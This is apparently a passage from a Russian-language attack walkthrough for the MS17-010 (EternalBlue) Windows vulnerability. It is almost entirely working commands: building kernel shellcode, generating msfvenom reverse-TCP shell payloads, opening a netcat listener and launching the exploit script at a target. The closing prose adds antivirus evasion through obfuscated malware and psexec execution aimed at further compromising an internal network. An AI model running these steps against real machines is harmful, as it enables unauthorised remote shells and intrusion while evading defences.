Windows**
git clonehttps://github.com/worawit/MS17-010.git
cd MS17-010/
$ nasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
$ nasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.Y LPORT=4444 -f raw -o sc_x86_msf.bin EXITFUNC=thread $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.2.Y LPORT=4444 -a x64 -f raw -o sc_x64_msf.bin EXITFUNC=thread
$ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin $ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin $ python2.7 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
$ nc -lp 4444
$ python2.7 eternalblue_exploit7.py 10.0.2.X ./shellcode/sc_all
Это считается продвинутым способом эксплуатации, но фактически такие манипуляции на раз два обнаруживаются антивирусными средствами защиты. Поэтому в ход вступает либо гугуление на предмет обфускации, разработка малваря или обфускация не только сигнатур но и поведения вспомогательных утилит таких как psexec, к которой мы вернемся чуть позже.
psexec.py admin:[email protected] -debug -file ySfpwzUH_heh.exe
Мой исполняемый файл уже не будет замечен антивирусом и позволит выполнять дальнейшие действия по атаке на внутреннюю инфраструктуру.
https://codeby.net/threads/obxod-antivirusa-s-pomoschju-metasploita.69423/